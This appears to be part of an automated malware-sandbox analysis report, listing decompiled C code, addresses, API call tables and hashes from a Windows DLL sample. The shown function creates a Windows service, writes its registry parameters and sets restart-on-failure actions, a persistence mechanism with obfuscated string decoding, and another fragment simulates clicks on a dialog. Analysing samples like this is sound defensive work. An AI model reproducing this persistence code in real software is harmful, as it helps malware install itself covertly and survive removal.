                                                                                                        0x7098650b
                                                                                                        0x70986511
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70986513
                                                                                                        0x00000000
                                                                                                        0x70986513
                                                                                                        0x709864c4
                                                                                                        0x00000000
                                                                                                        0x709864c9
                                                                                                        0x7098620e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70986214
                                                                                                        0x7098621a
                                                                                                        0x709862fb
                                                                                                        0x70986301
                                                                                                        0x70986401
                                                                                                        0x70986406
                                                                                                        0x70986408
                                                                                                        0x7098640d
                                                                                                        0x7098643c
                                                                                                        0x7098643e
                                                                                                        0x70986444
                                                                                                        0x7098644c
                                                                                                        0x7098644d
                                                                                                        0x7098645d
                                                                                                        0x70986475
                                                                                                        0x7098640f
                                                                                                        0x7098640f
                                                                                                        0x70986415
                                                                                                        0x70986429
                                                                                                        0x7098642e
                                                                                                        0x00000000
                                                                                                        0x7098640d
                                                                                                        0x70986307
                                                                                                        0x7098630d
                                                                                                        0x709863be
                                                                                                        0x709863be
                                                                                                        0x709863c3
                                                                                                        0x709863ee
                                                                                                        0x709863f4
                                                                                                        0x00000000
                                                                                                        0x709863f9
                                                                                                        0x709863c9
                                                                                                        0x709863cc
                                                                                                        0x709863d0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709863d2
                                                                                                        0x709863d6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709863e1
                                                                                                        0x00000000
                                                                                                        0x709863e6
                                                                                                        0x70986313
                                                                                                        0x70986319
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098631f
                                                                                                        0x70986328
                                                                                                        0x7098632e
                                                                                                        0x70986330
                                                                                                        0x709863ad
                                                                                                        0x709863b1
                                                                                                        0x00000000
                                                                                                        0x709863b6
                                                                                                        0x70986332
                                                                                                        0x7098633e
                                                                                                        0x70986344
                                                                                                        0x70986346
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098635b
                                                                                                        0x7098635f
                                                                                                        0x70986367
                                                                                                        0x7098636d
                                                                                                        0x7098636f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70986379
                                                                                                        0x7098637e
                                                                                                        0x70986381
                                                                                                        0x70986385
                                                                                                        0x7098638b
                                                                                                        0x7098638e
                                                                                                        0x70986392
                                                                                                        0x70986394
                                                                                                        0x70986398
                                                                                                        0x7098639a
                                                                                                        0x7098639a
                                                                                                        0x7098639a
                                                                                                        0x70986398
                                                                                                        0x70986392
                                                                                                        0x7098639f
                                                                                                        0x709863a5
                                                                                                        0x709863a7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709863a7
                                                                                                        0x70986220
                                                                                                        0x70986275
                                                                                                        0x7098627a
                                                                                                        0x709862b6
                                                                                                        0x709862bc
                                                                                                        0x709862c2
                                                                                                        0x709862c6
                                                                                                        0x709862c7
                                                                                                        0x709862d7
                                                                                                        0x709862ee
                                                                                                        0x7098627c
                                                                                                        0x7098627c
                                                                                                        0x7098628a
                                                                                                        0x7098628b
                                                                                                        0x7098629c
                                                                                                        0x709862a1
                                                                                                        0x00000000
                                                                                                        0x7098627a
                                                                                                        0x70986222
                                                                                                        0x70986228
                                                                                                        0x70986263
                                                                                                        0x70986269
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098626f
                                                                                                        0x70986270
                                                                                                        0x70986271
                                                                                                        0x00000000
                                                                                                        0x70986271
                                                                                                        0x7098622a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70986230
                                                                                                        0x70986236
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098623c
                                                                                                        0x70986242
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70986248
                                                                                                        0x70986249
                                                                                                        0x7098624a
                                                                                                        0x00000000
                                                                                                        0x7098624a
                                                                                                        0x7098600b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70986011
                                                                                                        0x70986017
                                                                                                        0x709860bd
                                                                                                        0x709860c3
                                                                                                        0x709861f5
                                                                                                        0x00000000
                                                                                                        0x709861fa
                                                                                                        0x709860c9
                                                                                                        0x709860cf
                                                                                                        0x70986183
                                                                                                        0x70986183
                                                                                                        0x709861a7
                                                                                                        0x709861a9
                                                                                                        0x709861bb
                                                                                                        0x709861c5
                                                                                                        0x709861c7
                                                                                                        0x709861d9
                                                                                                        0x709861e0
                                                                                                        0x709861e7
                                                                                                        0x00000000
                                                                                                        0x709861ec
                                                                                                        0x709860d5
                                                                                                        0x709860db
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709860e1
                                                                                                        0x709860e5
                                                                                                        0x709860e8
                                                                                                        0x709860fc
                                                                                                        0x70986100
                                                                                                        0x70986103
                                                                                                        0x70986106
                                                                                                        0x70986109
                                                                                                        0x70986118
                                                                                                        0x70986118
                                                                                                        0x7098611b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70986121
                                                                                                        0x70986125
                                                                                                        0x00000000
                                                                                                        0x7098612b
                                                                                                        0x7098612b
                                                                                                        0x7098612b
                                                                                                        0x7098612d
                                                                                                        0x7098612d
                                                                                                        0x70986130
                                                                                                        0x70986148
                                                                                                        0x70986148
                                                                                                        0x70986148
                                                                                                        0x7098614a
                                                                                                        0x7098614a
                                                                                                        0x7098614b
                                                                                                        0x7098614c
                                                                                                        0x70986151
                                                                                                        0x70986154
                                                                                                        0x70986156
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70986162
                                                                                                        0x70986167
                                                                                                        0x7098616c
                                                                                                        0x7098616e
                                                                                                        0x7098616e
                                                                                                        0x7098616e
                                                                                                        0x70986176
                                                                                                        0x00000000
                                                                                                        0x7098617b
                                                                                                        0x70986132
                                                                                                        0x70986135
                                                                                                        0x70986139
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098613b
                                                                                                        0x7098613f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70986141
                                                                                                        0x00000000
                                                                                                        0x70986141
                                                                                                        0x70986125
                                                                                                        0x7098610b
                                                                                                        0x7098610f
                                                                                                        0x00000000
                                                                                                        0x70986111
                                                                                                        0x70986111
                                                                                                        0x00000000
                                                                                                        0x70986111
                                                                                                        0x709860ea
                                                                                                        0x709860ef
                                                                                                        0x00000000
                                                                                                        0x709860f4
                                                                                                        0x709860e8
                                                                                                        0x7098601d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70986029
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70986035
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70986041
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70986052
                                                                                                        0x7098605c
                                                                                                        0x70986070
                                                                                                        0x70986076
                                                                                                        0x7098607b
                                                                                                        0x7098607f
                                                                                                        0x7098608a
                                                                                                        0x70986096
                                                                                                        0x709860a6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709860a6

                                                                                                        APIs
                                                                                                        • CommandLineToArgvW.SHELL32(?,?), ref: 70985F50
                                                                                                        • CharLowerW.USER32 ref: 70985F7D
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800), ref: 70985FA2
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70985FA9
                                                                                                        • RtlComputeCrc32.NTDLL ref: 70985FE3
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 70985FF2
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70985FF9
                                                                                                        • GetTickCount.KERNEL32 ref: 70986047
                                                                                                        • RtlRandom.NTDLL ref: 70986056
                                                                                                        • StrChrW.SHLWAPI(7098CDA0,00000025,00000000), ref: 70986064
                                                                                                        • wsprintfW.USER32 ref: 70986070
                                                                                                        • WritePrivateProfileStringW.KERNEL32 ref: 7098609E
                                                                                                        • Sleep.KERNEL32(000003E8), ref: 7098616C
                                                                                                        • GetDlgItem.USER32 ref: 7098619A
                                                                                                        • PostMessageW.USER32(00000000), ref: 709861A7
                                                                                                        • PostMessageW.USER32(00000000,00000201,00000001,00490017), ref: 709861BB
                                                                                                        • Sleep.KERNEL32(00000064), ref: 709861C5
                                                                                                        • PostMessageW.USER32(00000000,00000202,00000000,00490017), ref: 709861D9
                                                                                                        • Sleep.KERNEL32(000007D0), ref: 709861E0
                                                                                                          • Part of subcall function 70985640: StrChrW.SHLWAPI(7098CBB8,00000050,00000001), ref: 70985687
                                                                                                          • Part of subcall function 70985640: StrChrW.SHLWAPI(7098CB94,00000055,00000000), ref: 70985691
                                                                                                          • Part of subcall function 70985640: StrChrW.SHLWAPI(7098C490,0000002E), ref: 709856BC
                                                                                                          • Part of subcall function 70985640: Sleep.KERNEL32(00000FA0), ref: 709856D3
                                                                                                          • Part of subcall function 70985640: GetProcessHeap.KERNEL32(00000008,00000800), ref: 709856E6
                                                                                                          • Part of subcall function 70985640: HeapAlloc.KERNEL32(00000000), ref: 709856E9
                                                                                                          • Part of subcall function 70985640: GetTickCount.KERNEL32 ref: 709856F5
                                                                                                          • Part of subcall function 70985640: RtlRandom.NTDLL ref: 70985704
                                                                                                          • Part of subcall function 70985640: StrChrW.SHLWAPI(7098CB08,0000002F,00B757B8,00000000,0000000A,00B757B8), ref: 7098571C
                                                                                                          • Part of subcall function 70985640: wsprintfW.USER32 ref: 70985720
                                                                                                          • Part of subcall function 70985640: StrChrW.SHLWAPI(7098CAF4,00000063,00000000,00000000,00000000,00000000), ref: 70985737
                                                                                                          • Part of subcall function 70985640: GetProcessHeap.KERNEL32(00000000,00000000), ref: 70985747
                                                                                                          • Part of subcall function 70985640: HeapFree.KERNEL32(00000000), ref: 7098574A
                                                                                                          • Part of subcall function 70985640: StrChrA.SHLWAPI(7098CA94,00000047,00784250,0000004B), ref: 70985766
                                                                                                          • Part of subcall function 70985640: StrChrA.SHLWAPI(7098CA8C,00000025,00000000), ref: 70985770
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 70986889
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70986890
                                                                                                        • LocalFree.KERNEL32(?), ref: 709868AA
                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 709868C5
                                                                                                        • CloseHandle.KERNEL32 ref: 709868CE
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 709868D9
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 709868DC
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 709868E7
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 709868EA
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 709868EE
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 709868F1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$Process$Free$Sleep$MessagePost$AllocCountRandomTickwsprintf$ArgvCharCloseCommandComputeCrc32HandleItemLineLocalLowerObjectPrivateProfileSingleStringWaitWrite
                                                                                                        • String ID: F]Da$R)jb$R)jb$g
                                                                                                        • API String ID: 2556819147-806280626
                                                                                                        • Opcode ID: ea129a9857787450229fcd83fb94fe33ad1b207d22576953866f95cd809c031a
                                                                                                        • Instruction ID: 61761fa01eaf2f4738f52cc940553029736f9195e0206d1a998d735b7225e1cb
                                                                                                        • Opcode Fuzzy Hash: ea129a9857787450229fcd83fb94fe33ad1b207d22576953866f95cd809c031a
                                                                                                        • Instruction Fuzzy Hash: B142E4B2914300AFD7109BA5CC89F2F77ADEB84708F11442AF9469B3D2D675ED448BA3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70983DC0, Relevance: 119.0, APIs: 79, Instructions: 521registrystringserviceCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 71%
                                                                                                        			E70983DC0() {
				short _v1568;
				short _v1576;
				char _v1604;
				short _v2096;
				char _v2104;
				short _v2108;
				short _v2112;
				short _v2116;
				short _v2120;
				short _v2124;
				short _v2128;
				short _v2132;
				short _v2136;
				void* _v2140;
				intOrPtr _v2144;
				void* _v2148;
				void* _v2152;
				int _v2156;
				short* _v2164;
				int _v2168;
				int _v2176;
				int _v2180;
				char _v2184;
				void* _v2188;
				char _v2192;
				void* _v2196;
				void* _v2200;
				void* _v2204;
				void* _v2208;
				void* _v2212;
				char _v2216;
				void* _v2220;
				void* _v2224;
				void* _v2228;
				short* _t86;
				void** _t96;
				WCHAR* _t102;
				intOrPtr _t107;
				intOrPtr _t113;
				int _t117;
				short* _t118;
				intOrPtr _t124;
				intOrPtr _t131;
				int _t152;
				char* _t154;
				int _t168;
				char* _t170;
				int _t186;
				char* _t188;
				void* _t192;
				void* _t195;
				WCHAR* _t201;
				char* _t211;
				char* _t223;
				intOrPtr _t233;
				void* _t240;
				short** _t247;
				short** _t250;
				short** _t251;
				short** _t252;
				short** _t253;
				short** _t254;

				_t247 =  &_v2164;
				_v2152 = 0;
				_t86 = OpenSCManagerW(0, 0, 0xf003f);
				_t240 = _t86;
				_v2148 = _t240;
				if(_t240 != 0) {
					L3:
					_v2164 = 0;
					_t195 = OpenServiceW(_t240, StrChrW(0x7098c90c, 0x55), 0xf01ff);
					if(_t195 != 0) {
						L15:
						_v2156 = 1;
						_push(StrChrW(0x7098c798, 0x5c));
						_push(StrChrW(0x7098c90c, 0x55));
						_push(StrChrW(0x7098c780, 0x5c));
						wsprintfW( &_v2104, StrChrW(0x7098c740, 0x53));
						if(RegCreateKeyExW(0x80000002,  &_v2096, 0, 0, 0, 0xf023f, 0,  &_v2176, 0) == 0) {
							_push(0x20a);
							_push( &_v2096);
							L7098BF02();
							_v2180 = 0x20a;
							_v2176 = 2;
							if(RegQueryValueExW(_v2188, StrChrW(0x7098c728, 0x53), 0,  &_v2176,  &_v2104,  &_v2180) != 0) {
								L18:
								_t107 =  *0x7098f5dc; // 0x33
								_t223 =  *0x7098f5d4; // 0xb7c4e8
								_t74 = _t107 + 2; // 0x35
								RegSetValueExW(_v2192, StrChrW(0x7098c728, 0x53), 0, 2, _t223, _t107 + _t74);
							} else {
								_t201 =  *0x7098f5d4; // 0xb7c4e8
								if(lstrcmpiW( &_v2108, _t201) != 0) {
									goto L18;
								}
							}
							RegCloseKey(_v2192);
						}
						L7098BF02();
						_t96 =  &_v2164;
						_v2164 = 0;
						__imp__QueryServiceStatusEx(_t195, 0,  &_v2140, 0x24, _t96,  &_v2132, 0x24);
						if(_t96 == 0 || _v2156 != 4) {
							if( *0x7098f5f4 == 0) {
								_push(0);
								_push(0);
							} else {
								_t102 = StrChrW(0x7098c6ac, 0x73);
								_push(1);
								_v2204 = _t102;
								_push( &_v2204);
							}
							_push(_t195);
							E70983920();
						}
						CloseServiceHandle(_t195);
					} else {
						if( *0x7098f5f4 != 0) {
							_t113 =  *0x7098f5ec; // 0xb52cda
							_push(_t113);
							_push(StrChrW(0x7098c8e4, 0x55));
							_push(StrChrW(0x7098c8d0, 0x73));
							_t117 = wsprintfW( &_v1576, StrChrW(0x7098c868, 0x25));
							_t250 =  &(_t247[5]);
							_v2168 = _t117;
							_t118 = StrChrW(0x7098c83c, 0x55);
							_t195 = CreateServiceW(_v2164, StrChrW(0x7098c90c, 0x55), _t118, 0xf01ff, 0x20, 2, 0,  &_v1568, 0, 0, 0, 0, 0);
							if(_t195 != 0) {
								_v2156 = 0;
								_v2148 = 0;
								_v2152 = 0;
								_v2136 = 1;
								_v2128 = 1;
								_v2120 = 1;
								_v2132 = 0x1388;
								_v2124 = 0x1388;
								_v2116 = 0x1388;
								_v2144 = 3;
								_v2140 =  &_v2136;
								__imp__ChangeServiceConfig2W(_t195, 2,  &_v2156);
								_push(0x7098c560);
								_push(0);
								_push(StrChrW(0x7098c8d0, 0x73));
								_t124 =  *0x7098f52c; // 0x748878
								_push(_t124);
								wsprintfW( &_v2120, StrChrW(0x7098c824, 0x25));
								_t251 =  &(_t250[6]);
								if(RegCreateKeyExW(0x80000002,  &_v2112, 0, 0, 0, 0xf023f, 0,  &_v2192, 0) == 0) {
									_t186 = lstrlenW(StrChrW(0x7098c90c, 0x55));
									_t188 = StrChrW(0x7098c90c, 0x55);
									RegSetValueExW(_v2204, StrChrW(0x7098c8e4, 0x55), 0, 7, _t188, _t186 + _t186);
									RegCloseKey(_v2204);
								}
								_push(StrChrW(0x7098c8e4, 0x55));
								_push(0x5c);
								_push(StrChrW(0x7098c8d0, 0x73));
								_t131 =  *0x7098f52c; // 0x748878
								_push(_t131);
								wsprintfW( &_v2124, StrChrW(0x7098c824, 0x25));
								_t252 =  &(_t251[6]);
								if(RegCreateKeyExW(0x80000002,  &_v2116, 0, 0, 0, 0xf023f, 0,  &_v2196, 0) == 0) {
									E70982200(_v2196, 4);
									_t252 =  &(_t252[2]);
									_v2184 = 0x2000;
									RegSetValueExW(_v2200, StrChrW(0x7098c7ec, 0x41), 0, 4,  &_v2184, 4);
									_v2192 = 1;
									RegSetValueExW(_v2204, StrChrW(0x7098c7b4, 0x43), 0, 4,  &_v2192, 4);
									RegCloseKey(_v2204);
								}
								_push(StrChrW(0x7098c798, 0x5c));
								_push(StrChrW(0x7098c90c, 0x55));
								_push(StrChrW(0x7098c780, 0x5c));
								wsprintfW( &_v2132, StrChrW(0x7098c740, 0x53));
								_t253 =  &(_t252[5]);
								if(RegCreateKeyExW(0x80000002,  &_v2124, 0, 0, 0, 0xf023f, 0,  &_v2204, 0) == 0) {
									E70982200(_v2204, 4);
									_t233 =  *0x7098f5dc; // 0x33
									_t211 =  *0x7098f5d4; // 0xb7c4e8
									_t253 =  &(_t253[2]);
									_t43 = _t233 + 2; // 0x35
									RegSetValueExW(_v2208, StrChrW(0x7098c728, 0x53), 0, 2, _t211, _t233 + _t43);
									RegSetValueExW(_v2212, StrChrW(0x7098c710, 0x49), 0, 2,  &_v1604, _v2204 + _v2204 + 2);
									_t168 = lstrlenW(StrChrW(0x7098c700, 0x53));
									_t170 = StrChrW(0x7098c700, 0x53);
									RegSetValueExW(_v2224, StrChrW(0x7098c6e4, 0x53), 0, 1, _t170, _t168 + _t168);
									_v2216 = 0;
									RegSetValueExW(_v2228, StrChrW(0x7098c6b4, 0x53), 0, 4,  &_v2216, 4);
									RegCloseKey(_v2228);
								}
								_push(0x7098c560);
								_push(StrChrW(0x7098c90c, 0x55));
								_push(StrChrW(0x7098c780, 0x5c));
								wsprintfW( &_v2136, StrChrW(0x7098c740, 0x53));
								_t254 =  &(_t253[5]);
								if(RegCreateKeyExW(0x80000002,  &_v2128, 0, 0, 0, 0xf023f, 0,  &_v2208, 0) == 0) {
									E70982200(_v2208, 4);
									_t254 =  &(_t254[2]);
									_t152 = lstrlenW(StrChrW(0x7098c700, 0x53));
									_t154 = StrChrW(0x7098c700, 0x53);
									RegSetValueExW(_v2220, StrChrW(0x7098c6e4, 0x53), 0, 1, _t154, _t152 + _t152);
									RegCloseKey(_v2220);
								}
								E70982200(_t195, 2);
								_t247 =  &(_t254[2]);
								goto L15;
							}
						}
					}
					CloseServiceHandle(_v2188);
					return _v2192;
				} else {
					_t192 = OpenSCManagerW(_t86, _t86, 1);
					_v2148 = _t192;
					if(_t192 == 0) {
						return 0;
					} else {
						_t240 = _t192;
						goto L3;
					}
				}
			}

































































                                                                                                        0x70983dc0
                                                                                                        0x70983dd8
                                                                                                        0x70983ddc
                                                                                                        0x70983dde
                                                                                                        0x70983de0
                                                                                                        0x70983de6
                                                                                                        0x70983dfc
                                                                                                        0x70983e0f
                                                                                                        0x70983e29
                                                                                                        0x70983e2d
                                                                                                        0x7098421a
                                                                                                        0x70984221
                                                                                                        0x7098422b
                                                                                                        0x70984235
                                                                                                        0x7098423f
                                                                                                        0x7098424f
                                                                                                        0x7098427a
                                                                                                        0x70984280
                                                                                                        0x70984289
                                                                                                        0x7098428a
                                                                                                        0x709842a7
                                                                                                        0x709842af
                                                                                                        0x709842c7
                                                                                                        0x709842df
                                                                                                        0x709842df
                                                                                                        0x709842e4
                                                                                                        0x709842ea
                                                                                                        0x70984303
                                                                                                        0x709842c9
                                                                                                        0x709842c9
                                                                                                        0x709842dd
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709842dd
                                                                                                        0x7098430a
                                                                                                        0x7098430a
                                                                                                        0x70984317
                                                                                                        0x7098431c
                                                                                                        0x7098432b
                                                                                                        0x70984333
                                                                                                        0x7098433b
                                                                                                        0x7098434b
                                                                                                        0x70984363
                                                                                                        0x70984365
                                                                                                        0x7098434d
                                                                                                        0x70984354
                                                                                                        0x70984356
                                                                                                        0x7098435c
                                                                                                        0x70984360
                                                                                                        0x70984360
                                                                                                        0x70984367
                                                                                                        0x70984368
                                                                                                        0x7098436d
                                                                                                        0x70984371
                                                                                                        0x70983e33
                                                                                                        0x70983e3a
                                                                                                        0x70983e40
                                                                                                        0x70983e45
                                                                                                        0x70983e4f
                                                                                                        0x70983e59
                                                                                                        0x70983e6c
                                                                                                        0x70983e6e
                                                                                                        0x70983e95
                                                                                                        0x70983e99
                                                                                                        0x70983eb1
                                                                                                        0x70983eb7
                                                                                                        0x70983ebd
                                                                                                        0x70983ec1
                                                                                                        0x70983ec5
                                                                                                        0x70983ed8
                                                                                                        0x70983edc
                                                                                                        0x70983ee0
                                                                                                        0x70983eeb
                                                                                                        0x70983eef
                                                                                                        0x70983ef3
                                                                                                        0x70983ef7
                                                                                                        0x70983eff
                                                                                                        0x70983f03
                                                                                                        0x70983f09
                                                                                                        0x70983f0e
                                                                                                        0x70983f19
                                                                                                        0x70983f1a
                                                                                                        0x70983f1f
                                                                                                        0x70983f2f
                                                                                                        0x70983f31
                                                                                                        0x70983f5a
                                                                                                        0x70983f66
                                                                                                        0x70983f76
                                                                                                        0x70983f8c
                                                                                                        0x70983f93
                                                                                                        0x70983f93
                                                                                                        0x70983fa2
                                                                                                        0x70983fa3
                                                                                                        0x70983fae
                                                                                                        0x70983faf
                                                                                                        0x70983fb4
                                                                                                        0x70983fc4
                                                                                                        0x70983fc6
                                                                                                        0x70983fef
                                                                                                        0x70983ff8
                                                                                                        0x70983ffd
                                                                                                        0x70984012
                                                                                                        0x70984022
                                                                                                        0x70984036
                                                                                                        0x70984046
                                                                                                        0x7098404d
                                                                                                        0x7098404d
                                                                                                        0x7098405c
                                                                                                        0x70984066
                                                                                                        0x70984070
                                                                                                        0x70984080
                                                                                                        0x70984082
                                                                                                        0x709840ab
                                                                                                        0x709840b8
                                                                                                        0x709840bd
                                                                                                        0x709840c3
                                                                                                        0x709840c9
                                                                                                        0x709840cc
                                                                                                        0x709840e5
                                                                                                        0x7098410b
                                                                                                        0x70984117
                                                                                                        0x70984127
                                                                                                        0x7098413d
                                                                                                        0x70984151
                                                                                                        0x70984161
                                                                                                        0x70984168
                                                                                                        0x70984168
                                                                                                        0x7098416e
                                                                                                        0x7098417c
                                                                                                        0x70984186
                                                                                                        0x70984196
                                                                                                        0x70984198
                                                                                                        0x709841c1
                                                                                                        0x709841ca
                                                                                                        0x709841cf
                                                                                                        0x709841dc
                                                                                                        0x709841ec
                                                                                                        0x70984202
                                                                                                        0x70984209
                                                                                                        0x70984209
                                                                                                        0x70984212
                                                                                                        0x70984217
                                                                                                        0x00000000
                                                                                                        0x70984217
                                                                                                        0x70983eb7
                                                                                                        0x70983e3a
                                                                                                        0x7098437c
                                                                                                        0x70984390
                                                                                                        0x70983de8
                                                                                                        0x70983dec
                                                                                                        0x70983dee
                                                                                                        0x70983df4
                                                                                                        0x7098439c
                                                                                                        0x70983dfa
                                                                                                        0x70983dfa
                                                                                                        0x00000000
                                                                                                        0x70983dfa
                                                                                                        0x70983df4

                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 70983DDC
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 70983DEC
                                                                                                        • StrChrW.SHLWAPI(7098C90C,00000055,000F01FF), ref: 70983E13
                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000), ref: 70983E17
                                                                                                        • StrChrW.SHLWAPI(7098C8E4,00000055,00B52CDA), ref: 70983E4D
                                                                                                        • StrChrW.SHLWAPI(7098C8D0,00000073,00000000), ref: 70983E57
                                                                                                        • StrChrW.SHLWAPI(7098C868,00000025,00000000), ref: 70983E61
                                                                                                        • wsprintfW.USER32 ref: 70983E6C
                                                                                                        • StrChrW.SHLWAPI(7098C83C,00000055,000F01FF,00000020,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 70983E99
                                                                                                        • StrChrW.SHLWAPI(7098C90C,00000055,00000000), ref: 70983EA3
                                                                                                        • CreateServiceW.ADVAPI32(?,00000000), ref: 70983EAB
                                                                                                        • ChangeServiceConfig2W.ADVAPI32 ref: 70983F03
                                                                                                        • StrChrW.SHLWAPI(7098C8D0,00000073,00000000,7098C560), ref: 70983F17
                                                                                                        • StrChrW.SHLWAPI(7098C824,00000025,00748878,00000000), ref: 70983F27
                                                                                                        • wsprintfW.USER32 ref: 70983F2F
                                                                                                        • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000,?,?,?,00000000,00000002,?), ref: 70983F52
                                                                                                        • StrChrW.SHLWAPI(7098C90C,00000055,?,?,?,00000000,00000002,?), ref: 70983F63
                                                                                                        • lstrlenW.KERNEL32(00000000,?,?,?,00000000,00000002,?), ref: 70983F66
                                                                                                        • StrChrW.SHLWAPI(7098C90C,00000055,00000000,?,?,?,00000000,00000002,?), ref: 70983F76
                                                                                                        • StrChrW.SHLWAPI(7098C8E4,00000055,00000000,00000007,00000000,?,?,?,00000000,00000002,?), ref: 70983F84
                                                                                                        • RegSetValueExW.ADVAPI32(?,00000000,?,?,?,00000000,00000002,?), ref: 70983F8C
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,00000000,00000002,?), ref: 70983F93
                                                                                                        • StrChrW.SHLWAPI(7098C8E4,00000055,?,?,?,00000000,00000002,?), ref: 70983FA0
                                                                                                        • StrChrW.SHLWAPI(7098C8D0,00000073,0000005C,00000000,?,?,?,00000000,00000002,?), ref: 70983FAC
                                                                                                        • StrChrW.SHLWAPI(7098C824,00000025,00748878,00000000,?,?,?,00000000,00000002,?), ref: 70983FBC
                                                                                                        • wsprintfW.USER32 ref: 70983FC4
                                                                                                        • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 70983FE7
                                                                                                        • StrChrW.SHLWAPI ref: 7098401A
                                                                                                        • RegSetValueExW.ADVAPI32(?,00000000), ref: 70984022
                                                                                                        • StrChrW.SHLWAPI(7098C7B4,00000043,00000000,00000004,?,00000004), ref: 7098403E
                                                                                                        • RegSetValueExW.ADVAPI32(?,00000000), ref: 70984046
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 7098404D
                                                                                                        • StrChrW.SHLWAPI(7098C798,0000005C), ref: 7098405A
                                                                                                        • StrChrW.SHLWAPI(7098C90C,00000055,00000000), ref: 70984064
                                                                                                        • StrChrW.SHLWAPI(7098C780,0000005C,00000000), ref: 7098406E
                                                                                                        • StrChrW.SHLWAPI(7098C740,00000053,00000000), ref: 70984078
                                                                                                        • wsprintfW.USER32 ref: 70984080
                                                                                                        • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 709840A3
                                                                                                        • StrChrW.SHLWAPI(7098C728,00000053,00000000,00000002,00B7C4E8,00000035), ref: 709840DD
                                                                                                        • RegSetValueExW.ADVAPI32(?,00000000), ref: 709840E5
                                                                                                        • StrChrW.SHLWAPI(7098C710,00000049,00000000,00000002,?,?), ref: 70984103
                                                                                                        • RegSetValueExW.ADVAPI32(?,00000000), ref: 7098410B
                                                                                                        • StrChrW.SHLWAPI(7098C700,00000053), ref: 70984114
                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 70984117
                                                                                                        • StrChrW.SHLWAPI(7098C700,00000053,00000000), ref: 70984127
                                                                                                        • StrChrW.SHLWAPI(7098C6E4,00000053,00000000,00000001,00000000), ref: 70984135
                                                                                                        • RegSetValueExW.ADVAPI32(?,00000000), ref: 7098413D
                                                                                                        • StrChrW.SHLWAPI ref: 70984159
                                                                                                        • RegSetValueExW.ADVAPI32(?,00000000), ref: 70984161
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 70984168
                                                                                                        • StrChrW.SHLWAPI(7098C90C,00000055,7098C560), ref: 7098417A
                                                                                                        • StrChrW.SHLWAPI(7098C780,0000005C,00000000), ref: 70984184
                                                                                                        • StrChrW.SHLWAPI(7098C740,00000053,00000000), ref: 7098418E
                                                                                                        • wsprintfW.USER32 ref: 70984196
                                                                                                        • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 709841B9
                                                                                                        • StrChrW.SHLWAPI(7098C700,00000053), ref: 709841D9
                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 709841DC
